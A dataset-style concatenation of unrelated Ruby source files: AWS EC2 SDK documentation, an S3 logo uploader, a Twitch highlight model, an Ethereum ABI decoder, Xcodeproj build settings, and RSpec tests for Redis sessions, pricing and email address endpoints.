# You can specify other protocols than +:tcp+, like :udp and :icmp.
#
# == Elastic IPs
#
# You can allocate up to 5 elastic IP addresses for each account.
# You can associate those elastic IP addresses with EC2 instances:
#
# instance = ec2.instances['i-12345678']
# ip = ec2.elastic_ips.allocate
#
# instance.ip_address # 1.1.1.1
# ip.ip_address # 2.2.2.2
#
# instance.associate_elastic_ip(ip)
# instance.ip_address # 2.2.2.2
#
# instance.disassociate_elastic_ip
# instance.ip_address # 1.1.1.1
#
# When you are done with an elastic IP address you should release it.
# In the following example we release all elastic IP addresses that are
# not currently associated with an instance:
#
# ec2.select{|ip| !ip.associated? }.each(&:release)
#
# == Key Pairs
#
# Public Amazon Machine Image (AMI) instances have no password, and you need a
# public/private key pair to log in to them. The public key half
# of this pair is embedded in your instance, allowing you to use
# the private key to log in securely without a password.
#
# You can generate a key pair yourself and then send the public
# part to EC2 using {KeyPairCollection#import}. For example:
#
# key_pair =
# ec2.key_pairs.import("mykey", File.read("~/.ssh/identity.pub"))
#
# You can also ask EC2 to generate a key pair for you. For
# example:
#
# key_pair = ec2.key_pairs.create("mykey")
# File.open("~/.ssh/ec2", "w") do |f|
# f.write(key_pair.private_key)
# end
#
# == Filtering and Tagging
#
# Any of the collections in the interface may be filtered by a
# number of different parameters. For example, to get all the
# windows images owned by amazon where the description includes
# the string "linux", you can do this:
#
# ec2.images.with_owner("amazon").
# filter("platform", "windows").
# filter("description", "*linux*")
#
# Similarly, you can tag images, instances, security groups,
# snapshots, and volumes with free-form key-value metadata and
# filter on that metadata. For example:
#
# ec2.images["ami-123"].tags << "myapp"
# ec2.images.tagged("myapp") # will include ami-123
#
# == Regions
#
# Amazon has data centers in different areas of the world (e.g.,
# North America, Europe, Asia, etc.). Correspondingly, EC2 is
# available to use in different Regions. By launching instances in
# separate Regions, you can design your application to be closer
# to specific customers or to meet legal or other
# requirements. Prices for Amazon EC2 usage vary by Region (for
# more information about pricing by Region, go to the {Amazon EC2
# Pricing page}[http://aws.amazon.com/ec2/pricing]). You can use
# the Ruby SDK to see which regions are available for your
# account:
#
# ec2.regions.map(&:name) # => ["us-east-1", ...]
#
# The default region is +us-east-1+; you can access other regions
# like this:
#
# ec2_us_west = ec2.regions["us-west-1"]
# # starts an instance in eu-west-1
# ec2_us_west.instances.create(:image_id => 'ami-3bc9997e')
#
# This makes a call to EC2's DescribeRegions API to find the
# endpoint for "us-west-1" -- if you just want to configure a
# different endpoint without making a call to EC2, you can do it
# like this:
#
# ec2 = AWS::EC2.new(:ec2_endpoint =>
# "ec2.us-west-1.amazonaws.com")
#
# == Availability Zones
#
# Each Region contains multiple distinct locations called
# Availability Zones. Each Availability Zone is engineered to be
# isolated from failures in other Availability zones and to
# provide inexpensive, low-latency network connectivity to other
# zones in the same Region. By launching instances in separate
# Availability Zones, you can protect your applications from the
# failure of a single location.
#
# You can use the {#availability_zones} collection to get information
# about the available zones available to your account. For
# example:
#
# ec2.availability_zones.map(&:name) # => ["us-east-1a", ...]
#
# == Images
#
# An Amazon Machine Image (AMI) contains all information necessary
# to boot instances of your software. For example, an AMI might
# contain all the software to act as a web server (e.g., Linux,
# Apache, and your web site) or it might contain all the software
# to act as a Hadoop node (e.g., Linux, Hadoop, and a custom
# application).
#
# You can use the {#images} collection to get information about
# the images available to your account. For example:
#
# ec2.images.with_owner("amazon").map(&:name)
#
# You can also use the images collection to create new images:
#
# ec2.images.create(:image_location => "mybucket/manifest.xml",
# :name => "my-image")
#
class EC2
AWS.register_autoloads(self) do
autoload :Attachment, 'attachment'
autoload :AttachmentCollection, 'attachment_collection'
autoload :AvailabilityZone, 'availability_zone'
autoload :AvailabilityZoneCollection, 'availability_zone_collection'
autoload :BlockDeviceMappings, 'block_device_mappings'
autoload :Client, 'client'
autoload :Collection, 'collection'
autoload :ConfigTransform, 'config_transform'
autoload :ElasticIp, 'elastic_ip'
autoload :ElasticIpCollection, 'elastic_ip_collection'
autoload :Errors, 'errors'
autoload :FilteredCollection, 'filtered_collection'
autoload :HasPermissions, 'has_permissions'
autoload :Image, 'image'
autoload :ImageCollection, 'image_collection'
autoload :Instance, 'instance'
autoload :InstanceCollection, 'instance_collection'
autoload :KeyPair, 'key_pair'
autoload :KeyPairCollection, 'key_pair_collection'
autoload :PermissionCollection, 'permission_collection'
autoload :Region, 'region'
autoload :RegionCollection, 'region_collection'
autoload :Request, 'request'
autoload :ReservedInstances, 'reserved_instances'
autoload :ReservedInstancesCollection, 'reserved_instances_collection'
autoload :ReservedInstancesOffering, 'reserved_instances_offering'
autoload :ReservedInstancesOfferingCollection,
'reserved_instances_offering_collection'
autoload :Resource, 'resource'
autoload :ResourceObject, 'tag_collection'
autoload :ResourceTagCollection, 'resource_tag_collection'
autoload :SecurityGroup, 'security_group'
autoload :SecurityGroupCollection, 'security_group_collection'
autoload :Snapshot, 'snapshot'
autoload :SnapshotCollection, 'snapshot_collection'
autoload :Tag, 'tag'
autoload :TagCollection, 'tag_collection'
autoload :TaggedCollection, 'tagged_collection'
autoload :TaggedItem, 'tagged_item'
autoload :Volume, 'volume'
autoload :VolumeCollection, 'volume_collection'
end
include Core::ServiceInterface
# @return [InstanceCollection] A collection representing all instances
def instances
InstanceCollection.new(:config => config)
end
# @return [SecurityGroupCollection] A collection representing all security
# groups.
def security_groups
SecurityGroupCollection.new(:config => config)
end
# @return [ElasticIpCollection] A collection representing all
# elastic IP addresses for this account.
def elastic_ips
ElasticIpCollection.new(:config => config)
end
# @return [KeyPairCollection] A collection representing all key pairs.
def key_pairs
KeyPairCollection.new(:config => config)
end
# @return [TagCollection] A collection representing all EC2 tags for
# all resource types.
def tags
TagCollection.new(:config => config)
end
# @return [RegionCollection] A collection representing all EC2
# regions.
def regions
RegionCollection.new(:config => config)
end
# @return [AvailabilityZoneCollection] A collection representing
# all EC2 availability zones.
def availability_zones
AvailabilityZoneCollection.new(:config => config)
end
# @return [ImageCollection] A collection representing
# all Amazon Machine Images available to your account.
def images
ImageCollection.new(:config => config)
end
# @return [VolumeCollection] A collection representing
# all EBS volumes available to your account.
def volumes
VolumeCollection.new(:config => config)
end
# @return [ReservedInstancesCollection] A collection representing all
# purchased reserved instance offerings.
def reserved_instances
ReservedInstancesCollection.new(:config => config)
end
# @return [ReservedInstancesOfferingCollection] A collection representing all
# reserved instance offerings that may be purchased.
def reserved_instances_offerings
ReservedInstancesOfferingCollection.new(:config => config)
end
# @return [SnapshotCollection] A collection representing
# all EBS snapshots available to your account.
def snapshots
SnapshotCollection.new(:config => config)
end
end
end
| 36.045326 | 81 | 0.687127 |
085f4f316a1d8cfdf1bde71453da4c54429163e6 | 2,863 | module PartnerLogoUploader
CONTENT_TYPES = [
'image/png',
'image/jpeg'
].freeze
def self.content_types
CONTENT_TYPES.join(', ')
end
def self.form params
raise if params[:partner_id].blank?
raise if params[:redirect_url].blank?
raise unless params[:filetype].in?(CONTENT_TYPES)
extension = EXTENSIONS[params[:filetype]]
raise if extension.nil?
key = "#{SecureRandom.uuid}.#{extension}"
s3_object = storage.object("partners/logo/#{key}")
payload = {
object_url: s3_object.public_url,
partner_id: params[:partner_id]
}
redirect_url = append_payload(payload, to: params[:redirect_url])
post_data = s3_object.presigned_post(
signature_expiration: 1.minute.from_now,
acl: 'public-read',
cache_control: "private, max-age=#{1.year.to_i}",
content_type: params[:filetype],
success_action_redirect: redirect_url
)
return {
url: post_data.url,
fields: post_data.fields
}
end
def self.handle_success params
payload = PartnerLogoUploader.payload(params)
raise if payload.nil?
partner = Partner.find(payload[:partner_id])
previous_logo = partner.large_logo_url
partner.update_column(:large_logo_url, payload[:object_url])
AsyncService.new(self).delete_s3_object_with_public_url(previous_logo)
partner
end
def self.delete_s3_object_with_public_url url
s3_object_with_public_url(url)&.delete
end
private
EXTENSIONS = {
'image/png' => 'png',
'image/jpeg' => 'jpeg',
}.freeze
def self.payload params
extract_payload(params: params, keys: [:object_url, :partner_id])
end
def self.storage
Storage::Client.avatars
end
def self.append_payload payload, to:
payload = sign_payload(payload)
url = URI(to)
url_params = CGI.parse(url.query || '')
payload.each do |key, value|
url_params[key.to_s] = value
end
url.query = URI.encode_www_form(url_params).presence
url.to_s
end
def self.sign_payload payload, expiration: 1.minute.from_now
payload[:signature_expiration] = expiration.to_i
payload.delete(:signature)
payload[:signature] = SignatureService.sign(signature_key(payload))
payload
end
def self.signature_key params
URI.encode_www_form(params.sort_by { |key, _| key.to_s })
end
def self.extract_payload params:, keys:
payload = params.slice(*keys, :signature_expiration)
return nil if payload[:signature_expiration].to_i < Time.now.to_i
return nil unless SignatureService.validate(signature_key(payload), params[:signature])
payload.except(:signature_expiration)
end
def self.s3_object_with_public_url url
base_url = storage.object(nil).public_url
return nil unless url.starts_with?(base_url)
key = url[base_url.length..-1]
storage.object(key)
end
end
| 25.792793 | 91 | 0.702061 |
ac9f37d290c958cbecd4041d2f2617667b189ed5 | 2,564 | class HighlightSuggestion < ApplicationRecord
belongs_to :run
validates :run, uniqueness: true
class << self
# from_run looks on Twitch for past broadcasts whose timestamps show that it contains the given run's PB. If found,
# the highlight suggestion is created and returned. If not found, nothing is created and something falsey is
# returned.
def from_run(run)
return if run.user.nil? || run.user.twitch.nil?
return run.highlight_suggestion if run.highlight_suggestion.present?
pb = run.histories.where.not(started_at: nil).where.not(ended_at: nil).find_by(
realtime_duration_ms: run.duration(Run::REAL).to_ms,
gametime_duration_ms: run.duration(Run::GAME).to_ms
)
return if pb.nil? || pb.duration(Run::REAL).nil?
run.user.twitch.videos.each do |video|
match = /^((\d+)h)?((\d+)m)?((\d+)s)?$/.match(video['duration'])
hours = match[2].to_i.hours
minutes = match[4].to_i.minutes
seconds = match[6].to_i.seconds
video_start = DateTime.parse(video['created_at'])
video_end = video_start + hours + minutes + seconds
# subtracting DateTimes gives fractional days; we want seconds
video_duration = (video_end - video_start) * 1.day
next unless video_start - 30.seconds < pb.started_at && video_end + 30.seconds > pb.ended_at
video_time_at_pb_start = pb.started_at - video_start
video_time_at_pb_end = video_time_at_pb_start + (pb.duration(Run::REAL).to_ms / 1000)
highlight_suggestion = create(
run: run,
url: URI.parse("https://dashboard.twitch.tv/u/#{run.user.twitch.name}/content/video-producer/highlighter/#{video['id']}").tap do |uri|
uri.query = {
start: [0, (video_time_at_pb_start - 10.seconds).to_i].max,
end: [video_duration.to_i, (video_time_at_pb_end + 10.seconds).to_i].min,
title: "PB: #{run.game} #{run.category} in #{run.duration(run.default_timing).format}"
}.to_query
end
)
if highlight_suggestion.persisted?
# 60 days is life of archives for Partners / Twitch Prime members
HighlightCleanupJob.set(wait_until: video_start + 60.days).perform_later(highlight_suggestion)
end
return highlight_suggestion
end
nil
rescue RestClient::ExceptionWithResponse => e
Rails.logger.error([e.message, *e.backtrace].join($RS))
Rollbar.error(e, response: e.response)
nil
end
end
end
| 41.354839 | 144 | 0.652496 |
bbed6d9686b1a442c79354739534963f402dc8fd | 53 | class ChattingController < FayeRails::Controller
end
| 17.666667 | 48 | 0.849057 |
ff8b80c529b70765f50076c6259a79b4d2eec113 | 183 | # Sample code from Programing Ruby, page 548
a = [ 'cat', 'dog' ]
b = [ 'cat', 'dog' ]
a == b
a.id == b.id
a.eql?(b)
a.equal?(b)
| 22.875 | 44 | 0.377049 |
39d9199a5213257fb1ac8162d0ea84cea8664ccc | 2,393 | # frozen_string_literal: true
describe Barong::RedisSession do
let!(:create_member_permission) do
create :permission,
role: 'member'
end
let!(:user) { create(:user) }
let!(:session_id) { SecureRandom.hex(16) }
let!(:hash_sid) { Barong::RedisSession.hexdigest_session(session_id) }
let!(:encrypted_value) { Barong::RedisSession.encrypted_session(session_id) }
after(:each) { clear_redis }
context 'add' do
before(:each) { clear_redis }
it 'add session key' do
Barong::RedisSession.add(user.uid, session_id, 120)
key = Barong::RedisSession.key_name(user.uid, session_id)
expect(Rails.cache.read(key)).to eq encrypted_value
end
end
context 'delete' do
before(:each) { clear_redis }
it 'delete key from redis list' do
Barong::RedisSession.add(user.uid, session_id, 120)
key = Barong::RedisSession.key_name(user.uid, session_id)
expect(Rails.cache.read(key)).to eq encrypted_value
res = Barong::RedisSession.delete(user.uid, session_id)
expect(res).to eq 1
expect(Rails.cache.read(key)).to eq nil
end
end
context 'update' do
before(:each) { clear_redis }
it 'should update redis session expire time' do
key = Barong::RedisSession.key_name(user.uid, session_id)
Barong::RedisSession.add(user.uid, session_id, 10)
expect(Rails.cache.read(key)).to eq encrypted_value
Barong::RedisSession.update(user.uid, session_id, 0.00000001)
expect(Rails.cache.read(key)).to eq nil
end
end
context 'invalidate_all' do
before(:each) { clear_redis }
before(:each) do
5.times {
session_id = SecureRandom.hex(16)
Barong::RedisSession.add(user.uid, session_id, 60)
}
end
context 'without session id' do
it 'should invalidate all sessions' do
expect(Rails.cache.redis.keys.length).to eq 5
Barong::RedisSession.invalidate_all(user.uid)
expect(Rails.cache.redis.keys).to eq []
end
end
context 'with session id' do
it 'should invalidate all sessions except one' do
sid = SecureRandom.hex(16)
Barong::RedisSession.add(user.uid, sid, 60)
expect(Rails.cache.redis.keys.length).to eq 6
Barong::RedisSession.invalidate_all(user.uid, sid)
expect(Rails.cache.redis.keys.length).to eq 1
end
end
end
end
| 27.825581 | 79 | 0.666109 |
219b85bd6398e46b215e74e101bdd17dd8f99893 | 1,470 | require File.dirname(__FILE__) + '/../../../test/test_helper'
require File.dirname(__FILE__) + '/../../spec_helper'
require 'admin/tags_controller'
# Re-raise errors caught by the controller.
class Admin::TagsController; def rescue_action(e) raise e end; end
describe Admin::TagsController do
before do
request.session = { :user => users(:tobi).id }
end
describe 'index action' do
before :each do
get :index
end
it 'should be success' do
response.should be_success
end
it 'should render template index' do
response.should render_template('index')
end
end
describe 'edit action' do
before(:each) do
@tag_id = contents(:article1).tags.first.id
get :edit, :id => @tag_id
end
it 'should be success' do
response.should be_success
end
it 'should render template edit' do
response.should render_template('edit')
end
it 'should assigns value :tag' do
assert_valid assigns(:tag)
end
end
describe 'update action' do
before :each do
@tag = Tag.find_by_id(contents(:article1).tags.first.id)
post :edit, 'id' => @tag.id, 'tag' => {:name => 'foobar', :display_name => 'Foo Bar'}
end
it 'should redirect to index' do
response.should redirect_to(:action => 'index')
end
it 'should update tag' do
@tag.reload
@tag.name.should == 'foobar'
@tag.display_name == "Foo Bar"
end
end
end
| 20.704225 | 91 | 0.634694 |
210928cfc4c149e2213a0920b023864971aa1817 | 3,876 | require "spec_helper"
require "active_model/serializer_support"
require "app/models/pricing"
RSpec.describe Pricing do
describe ".all" do
it "returns all of the pricings" do
pricings = Pricing.all
expect(pricings.count).to eq 4
[
[0, "basic", 0, "Hound"],
[4, "tier1", 49, "Chihuahua"],
[10, "tier2", 99, "Labrador"],
[30, "tier3", 249, "Great Dane"],
].each_with_index do |(allowance, id, price, title), index|
expect(pricings[index].allowance).to eq allowance
expect(pricings[index].id).to eq id
expect(pricings[index].price).to eq price
expect(pricings[index].title).to eq title
end
end
end
describe ".find_by" do
it "returns the pricing where the count is in range" do
pricing = Pricing.find_by(count: 7)
expect(pricing.allowance).to eq 10
expect(pricing.id).to eq "tier2"
expect(pricing.price).to eq 99
expect(pricing.title).to eq "Labrador"
end
end
describe "#==" do
context "when the pricings have the same identifiers" do
it "returns true" do
allowance = 4
id = "tier1"
price = 49
range = 1..allowance
title = "Chihuahua"
pricing_1 = Pricing.new(
id: id,
price: price,
range: range,
title: title,
)
pricing_2 = Pricing.new(
id: id,
price: price,
range: range,
title: title,
)
expect(pricing_1).to eq(pricing_2)
end
end
context "when the pricings have different identifiers" do
it "returns false" do
allowance = 4
id = "tier1"
price = 49
range = 1..allowance
title = "Chihuahua"
pricing_1 = Pricing.new(
id: id,
price: price,
range: range,
title: title,
)
pricing_2 = Pricing.new(
id: "tier2",
price: price,
range: range,
title: title,
)
expect(pricing_1).to_not eq(pricing_2)
end
end
end
describe "#allowance" do
it "returns the upper bound of the range" do
allowance = 4
id = "tier1"
price = 49
range = 1..allowance
title = "Chihuahua"
pricing = Pricing.new(id: id, price: price, range: range, title: title)
expect(pricing.allowance).to eq allowance
end
end
describe "#id" do
it "returns the initialized identifier" do
allowance = 4
id = "tier1"
price = 49
range = 1..allowance
title = "Chihuahua"
pricing = Pricing.new(id: id, price: price, range: range, title: title)
expect(pricing.id).to eq id
end
end
describe "#open_source?" do
it "returns true" do
pricing = Pricing.new(
id: "basic",
price: 0,
range: 0..0,
title: "Hound",
)
expect(pricing).to be_open_source
end
context "when the price is positive" do
it "returns false" do
pricing = Pricing.new(
id: "tier1",
price: 49,
range: 1..4,
title: "Chihuahua",
)
expect(pricing).to_not be_open_source
end
end
end
describe "#price" do
it "returns the initialized price" do
allowance = 4
id = "tier1"
price = 49
range = 1..allowance
title = "Chihuahua"
pricing = Pricing.new(id: id, price: price, range: range, title: title)
expect(pricing.price).to eq price
end
end
describe "#title" do
it "returns the initialized title" do
allowance = 4
id = "tier1"
price = 49
range = 1..allowance
title = "Chihuahua"
pricing = Pricing.new(id: id, price: price, range: range, title: title)
expect(pricing.title).to eq title
end
end
end
| 23.490909 | 77 | 0.557792 |
380895e6df52167ba62f95a6ecbb2130be64dba1 | 1,525 | require 'cicu'
describe Cicu::Ruleset do
describe "#new" do
it "should raise ArgumentError if rules are invalid" do
expect(proc { Cicu::Ruleset.new("?") }).to raise_exception(ArgumentError)
end
it "should raise TypeError if argument is not a string" do
expect(proc { Cicu::Ruleset.new([123]) }).to raise_exception(TypeError)
end
it "should raise ArgumentError if rules are too long" do
rules = "[normalization on] & " + 100_000.times.map { "a" }.join("<")
expect(proc { Cicu::Ruleset.new(rules) }).to raise_exception(ArgumentError)
end
it "should create a ruleset if rules are not too long" do
ruleset = Cicu::Ruleset.new("[normalization on] & a < a < a < a < a < a")
expect(ruleset.sort_key("123")).to eq("\x14\x16\x18\x01\a\x01\a")
end
it "should create a ruleset" do
ruleset = Cicu::Ruleset.new("[normalization on] & a < b")
expect(ruleset.sort_key("123")).to eq("\x14\x16\x18\x01\a\x01\a")
end
end
describe "#sort_key" do
it "should raise TypeErrorif argument is not a string" do
ruleset = Cicu::Ruleset.new("[normalization on] & b < a < c")
expect(proc { ruleset.sort_key([123]) }).to raise_exception(TypeError)
end
it "should sort any array according to the rukes" do
ary = %w( a b c ba bb bc )
ruleset = Cicu::Ruleset.new("[normalization on] & b < a < c")
sorted_ary = ary.sort_by { |el| ruleset.sort_key(el) }
expect(sorted_ary).to eq(%w( b bb ba bc a c ))
end
end
end | 42.361111 | 81 | 0.638689 |
39e3157ff6ab03125d891f8000a210c05c517307 | 1,279 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-securityhub'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - AWS SecurityHub'
spec.description = 'Official AWS Ruby gem for AWS SecurityHub. This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-securityhub',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-securityhub/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.127.0')
spec.add_dependency('aws-sigv4', '~> 1.1')
spec.required_ruby_version = '>= 2.3'
end
| 38.757576 | 115 | 0.668491 |
abff8025c576880bcaa762e196fbf6f3c1256b57 | 3,401 | module Ethereum
class Decoder
def decode(type, value, start = 0)
is_array, arity, array_subtype = Abi::parse_array_type(type)
if is_array && arity
decode_static_array(arity, array_subtype, value, start)
elsif is_array
decode_dynamic_array(array_subtype, value, start)
else
value = value.gsub(/^0x/,'')
core, subtype = Abi::parse_type(type)
method_name = "decode_#{core}".to_sym
self.send(method_name, value, subtype, start)
end
end
def decode_static_array(arity, array_subtype, value, start)
(0..arity-1).map { |i| decode(array_subtype, value, start + i * 64) }
end
def decode_dynamic_array(array_subtype, value, start)
location = decode_uint(value[start..(start+63)]) * 2
size = decode_uint(value[location..location+63])
(0..size-1).map { |i| decode(array_subtype, value, location + (i+1) * 64) }
end
def decode_fixed(value, subtype = "128x128", start = 0)
decode_int(trim(value, start, fixed_bitsize(subtype))).to_f / 2**exponent(subtype)
end
def decode_uint(value, subtype = "256", start = 0)
trim(value, start, bitsize(subtype)).hex
end
def decode_int(value, subtype = "256", start = 0)
raise ArgumentError if value.nil?
size = bitsize(subtype)
value = trim(value, start, size)
(value[0..1] == "ff") ? (value.hex - (2 ** size)) : value.hex
end
def decode_bool(value, _, start)
value = trim(value, start, 4)
return true if value == "1"
return false if value == "0"
raise ArgumentError
end
def decode_address(value, _ = nil, start)
raise ArgumentError if value.size-start < 64
value[start+24..start+63]
end
def decode_bytes(value, subtype, start)
subtype.present? ? decode_static_bytes(value, subtype, start) : decode_dynamic_bytes(value, start)
end
def decode_static_bytes(value, subtype = nil, start = 0)
trim(value, start, subtype.to_i*8).scan(/.{2}/).collect {|x| x.hex}.pack('C*').strip
end
def decode_dynamic_bytes(value, start = 0)
location = decode_uint(value[start..(start+63)]) * 2
size = decode_uint(value[location..location+63]) * 2
value[location+64..location+63+size].scan(/.{2}/).collect {|x| x.hex}.pack('C*')
end
def decode_string(value, _ = nil, start = 0)
decode_dynamic_bytes(value, start).force_encoding('utf-8')
end
def decode_arguments(arguments, data)
data = data.gsub(/^0x/,'')
types = arguments.map { |o| o.type }
types.each.with_index.map { |t , i| decode(t, data, i*64) }
end
def decode_tuple(value, subtype, start)
arr = []
size = value.size
array_items = size / 64
array_items.times do |t|
arr << value[start..start+63]
start = start + 64
end
arr
end
private
def trim(value, start, bitsize = 256)
value[start+63-(bitsize/4-1)..start+63]
end
def bitsize(subtype, default = 256)
subtype.present? ? subtype.to_i : default
end
def fixed_bitsize(subtype = nil)
subtype ||= "128x128"
_, x, n = /(\d+)x(\d+)/.match(subtype).to_a
x.to_i + n.to_i
end
def exponent(subtype, default = 128)
subtype.nil? ? default : /(\d+)x(\d+)/.match(subtype)[2].to_i
end
end
end
| 30.63964 | 104 | 0.610409 |
790417128cb89193e9cc4db580fa95ed64d7985f | 3,495 | module Xcodeproj
class Project
module Object
class XCBuildConfiguration < AbstractPBXObject
COMMON_BUILD_SETTINGS = {
:all => {
'GCC_VERSION' => 'com.apple.compilers.llvm.clang.1_0',
'GCC_PRECOMPILE_PREFIX_HEADER' => 'YES',
'PRODUCT_NAME' => '$(TARGET_NAME)',
'SKIP_INSTALL' => 'YES',
'DSTROOT' => '/tmp/xcodeproj.dst',
'ALWAYS_SEARCH_USER_PATHS' => 'NO',
'GCC_C_LANGUAGE_STANDARD' => 'gnu99',
'INSTALL_PATH' => "$(BUILT_PRODUCTS_DIR)",
'OTHER_LDFLAGS' => '',
'COPY_PHASE_STRIP' => 'YES',
}.freeze,
:debug => {
'GCC_DYNAMIC_NO_PIC' => 'NO',
'GCC_PREPROCESSOR_DEFINITIONS' => ["DEBUG=1", "$(inherited)"],
'GCC_SYMBOLS_PRIVATE_EXTERN' => 'NO',
'GCC_OPTIMIZATION_LEVEL' => '0',
'COPY_PHASE_STRIP' => 'NO',
}.freeze,
:ios => {
'ARCHS' => "$(ARCHS_STANDARD_32_BIT)",
'IPHONEOS_DEPLOYMENT_TARGET' => '4.3',
'PUBLIC_HEADERS_FOLDER_PATH' => "$(TARGET_NAME)",
'SDKROOT' => 'iphoneos',
}.freeze,
:osx => {
'ARCHS' => "$(ARCHS_STANDARD_64_BIT)",
'GCC_ENABLE_OBJC_EXCEPTIONS' => 'YES',
'GCC_VERSION' => 'com.apple.compilers.llvm.clang.1_0',
'MACOSX_DEPLOYMENT_TARGET' => '10.7',
'SDKROOT' => 'macosx',
}.freeze,
[:osx, :debug] => {
'ONLY_ACTIVE_ARCH' => 'YES',
}.freeze,
[:osx, :release] => {
'DEBUG_INFORMATION_FORMAT' => 'dwarf-with-dsym',
}.freeze,
[:ios, :release] => {
'VALIDATE_PRODUCT' => 'YES',
}.freeze,
}.freeze
def self.new_release(project)
new(project, nil,
'name' => 'Release',
'buildSettings' => COMMON_BUILD_SETTINGS[:all].dup
)
end
def self.new_debug(project)
new(project, nil,
'name' => 'Debug',
'buildSettings' => COMMON_BUILD_SETTINGS[:all].merge(COMMON_BUILD_SETTINGS[:debug])
)
end
# [Hash] the build settings used when building a target
attribute :build_settings
# TODO why do I need to specify the uuid here?
has_one :base_configuration, :uuid => :base_configuration_reference
def initialize(*)
super
self.build_settings ||= {}
end
end
class XCConfigurationList < AbstractPBXObject
attribute :default_configuration_is_visible
attribute :default_configuration_name
has_many :build_configurations
def initialize(*)
super
self.build_configuration_references ||= []
end
def build_settings(build_configuration_name)
if config = build_configurations.where(:name => build_configuration_name)
config.build_settings
end
end
end
end
end
end
| 36.030928 | 95 | 0.467525 |
91094a5eada4b41d10467e9fbf4bdf700811399f | 781 | # frozen_string_literal: true
class OrgAdmin::TemplateCustomizationsController < ApplicationController
include Paginable
include Versionable
after_action :verify_authorized
# POST /org_admin/templates/:id/customize
def create
@template = Template.find(params[:template_id])
authorize(@template, :customize?)
if @template.customize?(current_user.org)
begin
@customisation = @template.customize!(current_user.org)
redirect_to org_admin_template_path(@customisation)
return
rescue ArgumentError
flash[:alert] = _("Unable to customize that template.")
end
else
flash[:notice] = _("That template is not customizable.")
end
redirect_back(fallback_location: org_admin_templates_path)
end
end
| 27.892857 | 72 | 0.724712 |
61cc50945b2133379191ef560ccf07e03524000a | 9,044 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe 'email_address', type: :request do
include SchemaMatchers
let(:token) { 'fa0f28d6-224a-4015-a3b0-81e77de269f2' }
let(:auth_header) { { 'Authorization' => "Token token=#{token}" } }
let(:user) { build(:user, :loa3) }
before do
Timecop.freeze(Time.zone.local(2018, 6, 6, 15, 35, 55))
Session.create(uuid: user.uuid, token: token)
User.create(user)
end
after do
Timecop.return
end
describe 'POST /v0/profile/email_addresses' do
let(:email) { build(:email, vet360_id: user.vet360_id) }
context 'with a 200 response' do
it 'should match the email address schema', :aggregate_failures do
VCR.use_cassette('vet360/contact_information/post_email_success') do
post(
'/v0/profile/email_addresses',
{ email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:ok)
expect(response).to match_response_schema('vet360/transaction_response')
end
end
it 'creates a new AsyncTransaction::Vet360::EmailTransaction db record' do
VCR.use_cassette('vet360/contact_information/post_email_success') do
expect do
post(
'/v0/profile/email_addresses',
{ email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
end.to change(AsyncTransaction::Vet360::EmailTransaction, :count).from(0).to(1)
end
end
it 'invalidates the cache for the vet360-contact-info-response Redis key' do
VCR.use_cassette('vet360/contact_information/post_email_success') do
expect_any_instance_of(Common::RedisStore).to receive(:destroy)
post(
'/v0/profile/email_addresses',
{ email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
end
end
end
context 'with a 400 response' do
it 'should match the errors schema', :aggregate_failures do
VCR.use_cassette('vet360/contact_information/post_email_w_id_error') do
post(
'/v0/profile/email_addresses',
{ id: 42, email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:bad_request)
expect(response).to match_response_schema('errors')
end
end
it 'should not invalidate the cache' do
VCR.use_cassette('vet360/contact_information/post_email_w_id_error') do
expect_any_instance_of(Common::RedisStore).to_not receive(:destroy)
post(
'/v0/profile/email_addresses',
{ id: 42, email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
end
end
end
context 'with a 403 response' do
it 'should return a forbidden response' do
VCR.use_cassette('vet360/contact_information/post_email_status_403') do
post(
'/v0/profile/email_addresses',
{ email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:forbidden)
end
end
end
context 'with a validation issue' do
it 'should match the errors schema', :aggregate_failures do
post(
'/v0/profile/email_addresses',
{ email_address: '' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:unprocessable_entity)
expect(response).to match_response_schema('errors')
expect(errors_for(response)).to include "email-address - can't be blank"
end
end
end
describe 'PUT /v0/profile/email_addresses' do
let(:email) { build(:email, vet360_id: user.vet360_id) }
context 'with a 200 response' do
it 'should match the email address schema', :aggregate_failures do
VCR.use_cassette('vet360/contact_information/put_email_success') do
put(
'/v0/profile/email_addresses',
{ id: 42, email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:ok)
expect(response).to match_response_schema('vet360/transaction_response')
end
end
it 'creates a new AsyncTransaction::Vet360::EmailTransaction db record' do
VCR.use_cassette('vet360/contact_information/put_email_success') do
expect do
put(
'/v0/profile/email_addresses',
{ id: 42, email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
end.to change(AsyncTransaction::Vet360::EmailTransaction, :count).from(0).to(1)
end
end
